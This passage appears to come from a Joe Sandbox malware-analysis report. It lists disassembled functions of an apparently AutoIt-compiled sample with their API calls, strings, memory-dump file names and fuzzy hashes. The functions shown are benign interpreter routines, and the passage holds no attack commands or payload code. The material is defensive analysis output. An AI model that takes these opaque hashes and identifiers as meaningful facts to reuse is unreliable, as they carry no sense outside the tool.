RegCloseKey.ADVAPI32(?), ref: 005D4C5A
_wcslen.LIBCMT ref: 005D4CC1
_wcslen.LIBCMT ref: 005D4CD0

Strings

\, xrefs: 005D4CD6
Software\AutoIt v3\AutoIt, xrefs: 00595341
\Include\, xrefs: 00595308
Include, xrefs: 005D4BCE, 005D4C0F

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 429544e74d44605b7dc733555f75b204bd7f621f82bc0183ff8de420a4873a4c
Instruction ID: f8e644b044935e50f496fb0efa5f1372ac54e788bec4e3355736a46bf49df935
Opcode Fuzzy Hash: 429544e74d44605b7dc733555f75b204bd7f621f82bc0183ff8de420a4873a4c
Instruction Fuzzy Hash: 8C717B715043529FDB10EF69E8899ABBFE9FF98340B40142EF445973A0EBB09A49CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0059345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00593465
LoadCursorW.USER32(00000000,00007F00), ref: 00593474
LoadIconW.USER32(00000063), ref: 0059348A
LoadIconW.USER32(000000A4), ref: 0059349C
LoadIconW.USER32(000000A2), ref: 005934AE
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005934C6
RegisterClassExW.USER32(?), ref: 00593517

Part of subcall function 005935AB: GetSysColorBrush.USER32(0000000F), ref: 005935DE
Part of subcall function 005935AB: RegisterClassExW.USER32(00000030), ref: 00593608
Part of subcall function 005935AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00593619
Part of subcall function 005935AB: InitCommonControlsEx.COMCTL32(?), ref: 00593636
Part of subcall function 005935AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00593646
Part of subcall function 005935AB: LoadIconW.USER32(000000A9), ref: 0059365C
Part of subcall function 005935AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0059366B

Strings

AutoIt v3, xrefs: 00593506
0, xrefs: 005934E6
#, xrefs: 005934ED

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: c1db56e58c1bc82ff8c076564e0742a402bfd7c616ea6de6286093e1fa051ae1
Instruction ID: 44c80c9d4f950e96e7f8f09931a037ea6a02e75c994dbed411125016e0792d36
Opcode Fuzzy Hash: c1db56e58c1bc82ff8c076564e0742a402bfd7c616ea6de6286093e1fa051ae1
Instruction Fuzzy Hash: D0217C70D10759ABCB108FA5EC69AA97FF6FB08B40F00101BE604B23A0C7F909458F80

Uniqueness

Uniqueness Score: -1.00%

Function 0059CA50 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0059CE8E

Strings

x3f, xrefs: 005E14D1
p3f, xrefs: 005E15CC
p3f, xrefs: 0059CDB2
p5f, xrefs: 0059CE72
x3f, xrefs: 005E1570
p3f, xrefs: 0059CEAB
p3f, xrefs: 005E15B8
p5f, xrefs: 0059CC1C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Init_thread_footer
String ID: p3f$p3f$p3f$p3f$p5f$p5f$x3f$x3f
API String ID: 1385522511-3260310696
Opcode ID: 23db1aea24a5bb6db75bffb93a2e14bfd8bfc87ea1a89911394374c2f0caca5c
Instruction ID: 2024012ab6268128648a5a7e76e324b47e84ea731c82c04eec8294219f7e1a54
Opcode Fuzzy Hash: 23db1aea24a5bb6db75bffb93a2e14bfd8bfc87ea1a89911394374c2f0caca5c
Instruction Fuzzy Hash: 9F32BE75A00255AFDF24CF58C885ABABFBAFF44300F18845AE856AB391C774ED41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00593AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00597953: FindCloseChangeNotification.KERNELBASE(?,?,00000000,005D3A1C), ref: 00597973

Part of subcall function 00596E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00593B33,?,00008000), ref: 00596E80

SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00593C17
_wcslen.LIBCMT ref: 00593C96
SetCurrentDirectoryW.KERNEL32(?), ref: 00593D81

Strings

Bad directive syntax error, xrefs: 005D44E2
Error opening the file, xrefs: 005D4509, 005D4570
EA06, xrefs: 005D41B4
#include depth exceeded. Make sure there are no recursive includes, xrefs: 005D413C
Unterminated string, xrefs: 005D4554
AU3!, xrefs: 00593BC8

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2701412040-3738523708
Opcode ID: 14a045c8e1919de09cf6568f72cf1d7584dd558d74a78b1e3e8584f73d3d78bf
Instruction ID: b51c86b5e3774561aba3f564b06bb4b224bc64a7ec631c108f18e98ac4f1336f
Opcode Fuzzy Hash: 14a045c8e1919de09cf6568f72cf1d7584dd558d74a78b1e3e8584f73d3d78bf
Instruction Fuzzy Hash: 4B229A700083429FDB24EF28D895AAFBFE5BFD4314F04491EF585972A2DB709A49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0059F680 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D5f, xrefs: 0059FB61
D5f, xrefs: 0059F890
Variable must be of type 'Object'., xrefs: 005E486A
D5f, xrefs: 005E45E0
D5f, xrefs: 005E458D
D5fD5f, xrefs: 0059F92E

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID:
String ID: D5f$D5f$D5f$D5f$D5fD5f$Variable must be of type 'Object'.
API String ID: 0-3917941627
Opcode ID: 6ed9b7c71acf9fbfd547a04a4c2b639ec39eea769179b6d774ecf2b03a95c70e
Instruction ID: 55dacc271a8e28e564b70d32b5df005604ae1926b39d93f9b941a3ecac940364
Opcode Fuzzy Hash: 6ed9b7c71acf9fbfd547a04a4c2b639ec39eea769179b6d774ecf2b03a95c70e
Instruction Fuzzy Hash: A5C27971A00215DFCF28CF58C884BAEBBB2FF59310F248569E955AB3A1D771AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00592A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00592A9B
OleUninitialize.OLE32(?,00000000), ref: 00592B3A
UnregisterHotKey.USER32(?), ref: 00592D1F
DestroyWindow.USER32(?), ref: 005D39F5
FreeLibrary.KERNEL32(?), ref: 005D3A5A
VirtualFree.KERNEL32(?,00000000,00008000), ref: 005D3A87

Strings

close all, xrefs: 00592A96

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 1ad8d57fdd062f6ae7e9f07018eef3730f037f5df75b27ac73316d4b673523c8
Instruction ID: 2e3c5afd21a0ab09722dcf733a45e9da471a4777fac938c23c3d1f73550fa664
Opcode Fuzzy Hash: 1ad8d57fdd062f6ae7e9f07018eef3730f037f5df75b27ac73316d4b673523c8
Instruction Fuzzy Hash: 45D15D31701222DFDB29EF19C999B69FBA5BF45700F1441AEE44AAB352CB70AD12CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0060874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00608907
SetCurrentDirectoryW.KERNELBASE(?), ref: 0060891B
GetFileAttributesW.KERNEL32(?), ref: 00608945
SetFileAttributesW.KERNELBASE(?,00000000), ref: 0060895F
SetCurrentDirectoryW.KERNEL32(?), ref: 00608971
SetCurrentDirectoryW.KERNEL32(?), ref: 006089BA
SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00608A0A

Strings

*.*, xrefs: 006089C0

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: da9a4af702281368b1bc88a27704db1037d2eb2cb460f875ba69b9287138d4e6
Instruction ID: 589beb005a148f05a5667073d68ed322b735a94487b1be51652e33b04b940622
Opcode Fuzzy Hash: da9a4af702281368b1bc88a27704db1037d2eb2cb460f875ba69b9287138d4e6
Instruction Fuzzy Hash: 57818E725443019FCB28EF54C484AABB7EABF95310F54882AF4C5D7291DB34ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005C90D5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a92345fa904d403b00fbb528ed59fd6328b1b8b712e6afe30b1dbd50614dd68b
Instruction ID: 6638a3839af765a2e152192c44003c634e16f82a85e26d688e8999f2070c6e0b
Opcode Fuzzy Hash: a92345fa904d403b00fbb528ed59fd6328b1b8b712e6afe30b1dbd50614dd68b
Instruction Fuzzy Hash: DCC1A1B4A0428AAFCF11DFE8C849FADBFB5BF49310F18455DE814A7292C7709942CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00592735 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00593205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00593236
Part of subcall function 00593205: MapVirtualKeyW.USER32(00000010,00000000), ref: 0059323E
Part of subcall function 00593205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00593249
Part of subcall function 00593205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00593254
Part of subcall function 00593205: MapVirtualKeyW.USER32(00000011,00000000), ref: 0059325C
Part of subcall function 00593205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00593264

Part of subcall function 0059318C: RegisterWindowMessageW.USER32(00000004,?,00592906), ref: 005931E4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 005929AC
OleInitialize.OLE32 ref: 005929CA
CloseHandle.KERNEL32(00000000,00000000), ref: 005D39E7

Strings

@(f, xrefs: 00592906
$f, xrefs: 005927AC
(&f, xrefs: 005928D4
0$f, xrefs: 005929D0

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (&f$0$f$@(f$$f
API String ID: 1986988660-3826714810
Opcode ID: e4c44949d7e938fb6341371488d1d8069d94c34433b68b3f77ef0f54a8d01e3b
Instruction ID: a6676733eefd7864499fc371fcdd557728c7ab87dd8a903bf2f87738fa706daa
Opcode Fuzzy Hash: e4c44949d7e938fb6341371488d1d8069d94c34433b68b3f77ef0f54a8d01e3b
Instruction Fuzzy Hash: 74717CB0911A438FD7A8DF7AED796153EE3BB88344710A12EE01AC72B1EBB05485CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0059353A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00593568
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00593589
ShowWindow.USER32(00000000,?,?,?,?,?,?,005932EF,?), ref: 0059359D
ShowWindow.USER32(00000000,?,?,?,?,?,?,005932EF,?), ref: 005935A6

Strings

edit, xrefs: 00593583
AutoIt v3, xrefs: 00593560, 00593565, 00593566

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: b1c664bc2bf5db59bb390f3dedb65ea52fcf77bcd234753b3b29ae1591ea6b63
Instruction ID: b85d9afebb36daf54f028ef8133d51c07c75e9865e95d3d8cad4703ed39b6405
Opcode Fuzzy Hash: b1c664bc2bf5db59bb390f3dedb65ea52fcf77bcd234753b3b29ae1591ea6b63
Instruction Fuzzy Hash: EBF03A706006967AEB310B17AC18E372FBFD7C6F50B10101EF904B72A0C2A90841DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 005955F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,005955EB,SwapMouseButtons,00000004,?), ref: 0059561C
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,005955EB,SwapMouseButtons,00000004,?), ref: 0059563D
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,005955EB,SwapMouseButtons,00000004,?), ref: 0059565F

Strings

Control Panel\Mouse, xrefs: 0059561A

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6942ac0ddf0805811ddaa3a7002bb69db4647bac06da4693d464a10641155e4d
Instruction ID: df850c850b3e811f23765fd4c05ae8d995cb49f568f1cec448644af27a40ab31
Opcode Fuzzy Hash: 6942ac0ddf0805811ddaa3a7002bb69db4647bac06da4693d464a10641155e4d
Instruction Fuzzy Hash: E21157B1611A08BFDF228F64CC84EAEBBB8FF00748B544469A805D7120E671AE559B60

Uniqueness

Uniqueness Score: -1.00%

Function 005FDA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0062DC30), ref: 005FDABB
GetLastError.KERNEL32 ref: 005FDACA
CreateDirectoryW.KERNELBASE(?,00000000), ref: 005FDAD9
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0062DC30), ref: 005FDB36

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: fba279d659f22ad7635abe960aed25b40b8bff4d93dd3e113f60e7da6b3a5409
Instruction ID: 3cf0f17d638b9baa53c7f092d52bdb5912a789e34527859cceedd687528f9463
Opcode Fuzzy Hash: fba279d659f22ad7635abe960aed25b40b8bff4d93dd3e113f60e7da6b3a5409
Instruction Fuzzy Hash: 902191305092099F8710DF24D8859BBBBF9FE96364F144A1DF599832A1D734D90ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 00593A1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 005D4115

Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E

Part of subcall function 005939DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005939FD

Strings

X, xrefs: 005D40E3
`ue, xrefs: 005D410E

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`ue
API String ID: 779396738-3327563834
Opcode ID: 58ccc3fc299edcb9a0a16878e6ec91097e4ab44e3ec5a18e90f07784c3b16b30
Instruction ID: 275baa89034a41da1a704f31fdaa0ff3bdeece7d3c752338ab0894329a144a4b
Opcode Fuzzy Hash: 58ccc3fc299edcb9a0a16878e6ec91097e4ab44e3ec5a18e90f07784c3b16b30
Instruction Fuzzy Hash: 82219671A042599BCF11DF98D8497EE7FFDAF85305F00401AE505A7341DBF45A898FA1

Uniqueness

Uniqueness Score: -1.00%

Function 005B016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 005B09F8

Part of subcall function 005B3634: RaiseException.KERNEL32(?,?,?,005B0A1A,?,00000000,?,?,?,?,?,?,005B0A1A,00000000,00659758,00000000), ref: 005B3694

__CxxThrowException@8.LIBVCRUNTIME ref: 005B0A15

Strings

Unknown exception, xrefs: 005B0A22

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 4c03d030dfd0a0abe1d2826f5db3e1f4d8ff9fced011ed862bb04d3b39242166
Instruction ID: 43cbc5ae260b91d6cdd3e0e21e96e87dc60a99661bf26faf3370e423cb23b836
Opcode Fuzzy Hash: 4c03d030dfd0a0abe1d2826f5db3e1f4d8ff9fced011ed862bb04d3b39242166
Instruction Fuzzy Hash: 6DF0623490030EB79B04BAA8DC5A9EFBF6C7E40350B605525BD24964E2EB71FA5AC5D0

Uniqueness

Uniqueness Score: -1.00%

Function 006188B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00618C52
TerminateProcess.KERNEL32(00000000), ref: 00618C59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00618E3A

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 28efb0ff7808e0980541db16f044a64c8aa26e1d80e6ae97253a882905f2c382
Instruction ID: 405539252f804665a688896bfe9b0359000a5a36a45b9d5abf38da3662d14af5
Opcode Fuzzy Hash: 28efb0ff7808e0980541db16f044a64c8aa26e1d80e6ae97253a882905f2c382
Instruction Fuzzy Hash: 93125E719083419FD714CF24C494BAABBE6FF85314F18895DE8898B392DB30E985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00596BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00596CA1
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00596CB1

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

